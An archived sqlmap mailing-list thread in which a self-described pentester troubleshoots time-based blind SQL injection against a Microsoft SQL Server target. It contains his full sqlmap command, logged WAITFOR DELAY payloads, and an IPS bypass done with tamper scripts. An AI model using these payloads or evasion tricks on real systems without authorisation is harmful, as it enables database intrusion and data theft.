As Rodrigo stated correctly, you can use -C to specify column names
manually.
For forcing sqlmap to requery certain results you can use --fresh-queries.
Bye
p.s. thx for donation :)
p.p.s. I am glad that you managed to use tamper scripts to bypass IPS/WAF
On Sep 25, 2014 8:04 PM, "Rodrigo Zanatta Silva" <
rodrigozanattasi...@gmail.com> wrote:
> well, about the column, it is possible, I think, use the
>
>> -D DB DBMS database to enumerate
>> -T TBL DBMS database table(s) to enumerate
>> -C COL DBMS database table column(s) to enumerate
>> -X EXCLUDECOL DBMS database table column(s) to not enumerate
>> -U USER DBMS user to enumerate
>
> I really think the -C will search your column. There are a brutal force
> for common column (or was table?) Anyway, set your colum and it will
> accept.
>
> 2014-09-25 10:17 GMT-03:00 floyd <floyd_...@yahoo.de>:
>
>> Hi Miroslav
>>
>> Thanks for your time and for sqlmap. I hope you got the donation :)
>>
>> By now I figured out what it was: an IPS. Had to
>> --tamper=caseselect,charencode where caseselect is just a simple
>> .replace("SELECT","sElEcT"). What a stupid IPS.
>>
>> Is there any way to correct errors that sqlmap is getting? I sometimes
>> have an extra character at the end of table names and would like to
>> correct that.
>>
>> And: Is there a possibility to tell sqlmap manually, which columns a
>> table has? That would be very helpful for blind time based, because,
>> well, it takes forever :)
>>
>> Btw. awesome resume feature on ^C !
>>
>> Best,
>> floyd
>>
>> On 24/09/14 13:03, Miroslav Stampar wrote:
>> > Hi.
>> >
>> > This looks like a permission problem while reading system tables. That
>> > would explain why DB_NAME() works and everything else fails.
>> >
>> > Bye
>> >
>> > On Sep 23, 2014 4:27 PM, "floyd" <floyd_...@yahoo.de
>> > <mailto:floyd_...@yahoo.de>> wrote:
>> >
>> > Hi everybody
>> >
>> > I'm doing a Pentest and I'm able to do a time based blind sql
>> injection
>> > on a very big database.
>> >
>> > It takes some time, but that's fine for now. But sqlmap is failing
>> when
>> > it comes to retrieving the *number of [databases, tables, columns,
>> > whatever]*:
>> >
>> > $ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p
>> "redactedParameter"
>> > --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
>> > Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL
>> > --os=Windows --suffix="; --" --prefix="';" --technique=T -v 3
>> > --time-sec=2 --proxy socks5://localhost:5050 --dbs -o
>> > [...snip...]
>> > [11:57:49] [INFO] confirming Microsoft SQL Server
>> > [11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
>> > web server operating system: Windows
>> > web application technology: ASP.NET <http://ASP.NET>, ASP.NET
>> > <http://ASP.NET> 2.X.XXXXX (redacted)
>> > back-end DBMS: Microsoft SQL Server 2008
>> > [11:57:49] [INFO] fetching database names
>> > [11:57:49] [INFO] fetching number of databases
>> > [11:57:49] [WARNING] multi-threading is considered unsafe in
>> time-based
>> > data retrieval. Going to switch it off automatically
>> > [11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32))
>> FROM
>> > master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
>> > [11:57:49] [WARNING] time-based comparison requires larger
>> statistical
>> > model, please wait..............................
>> > [11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32))
>> FROM
>> > master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
>> > [11:58:25] [WARNING] it is very important not to stress the network
>> > adapter during usage of time-based payloads to prevent potential
>> errors
>> > [11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32))
>> FROM
>> > master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
>> > [11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32))
>> FROM
>> > master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
>> > [11:59:55] [INFO] retrieved:
>> > [11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
>> > [11:59:55] [WARNING] in case of continuous data retrieval problems
>> you
>> > are advised to try a switch '--no-cast' or switch '--hex'
>> > [11:59:55] [ERROR] unable to retrieve the number of databases
>> >
>> > However, for the *database names* sqlmap will continue with the
>> > DB_NAME(X) technique. Right now it is dumping out all the different
>> > database names, which works fine:
>> >
>> > [15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> > ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109)
>> > WAITFOR DELAY '0:0:2'; --
>> >
>> > Because I got many of the following errors (and the occurence of the
>> > error is random), I patched the time delay in the python code to be
>> > fixed to 2 seconds (maybe you want to have an option for that):
>> >
>> > [15:03:14] [ERROR] invalid character detected. retrying..
>> > [15:03:14] [WARNING] increasing time delay to 3 seconds
>> >
>> > That works fine and I get good results. However, when I try to dump
>> > table names now (from one of the known databases) with the -D
>> DB_NAME
>> > and --tables switch, it is again failing to retrieve the number of
>> > tables:
>> >
>> > [14:51:53] [INFO] fetching tables for database: DB_NAME
>> > [14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
>> > [14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >
>> master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
>> > NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM
>> DB_NAME..sysobjects
>> > WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66)
>> > WAITFOR DELAY '0:0:10'; --
>> > [14:51:53] [WARNING] time-based comparison requires larger
>> statistical
>> > model, please wait..............................
>> > [14:52:26] [CRITICAL] considerable lagging has been detected in
>> > connection response(s). Please use as high value for option
>> '--time-sec'
>> > as possible (e.g. 10 or more)
>> > [14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >
>> master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
>> > NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM
>> DB_NAME..sysobjects
>> > WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97)
>> > WAITFOR DELAY '0:0:10'; --
>> > [14:52:56] [WARNING] it is very important not to stress the network
>> > adapter during usage of time-based payloads to prevent potential
>> errors
>> > [14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >
>> master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
>> > NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM
>> DB_NAME..sysobjects
>> > WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101)
>> > WAITFOR DELAY '0:0:10'; --
>> > [14:54:56] [INFO] retrieved:
>> > [14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
>> > [...]
>> > [14:57:27] [INFO] retrieved:
>> > [14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
>> > [...]
>> > [14:59:57] [INFO] retrieved:
>> > [14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
>> > [14:59:57] [WARNING] unable to retrieve the number of tables for
>> > database 'DB_NAME'
>> > [14:59:57] [CRITICAL] unable to retrieve the tables for any database
>> >
>> > Any suggestions? Using higher --time-sec, --hex or --no-cast didn't
>> > help. Using --start and --stop also didn't work. I can't get any
>> data
>> > out of it like this.
>> >
>> > Best regards,
>> > floyd
>> >
>> >
>>
>> ------------------------------------------------------------------------------
>> > Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
>> > Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS
>> Reports
>> > Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
>> > Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
>> >
>> http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sqlmap-users@lists.sourceforge.net
>> > <mailto:sqlmap-users@lists.sourceforge.net>
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
>> Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS Reports
>> Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
>> Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
>>
>> http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
------------------------------------------------------------------------------
Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS Reports
Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
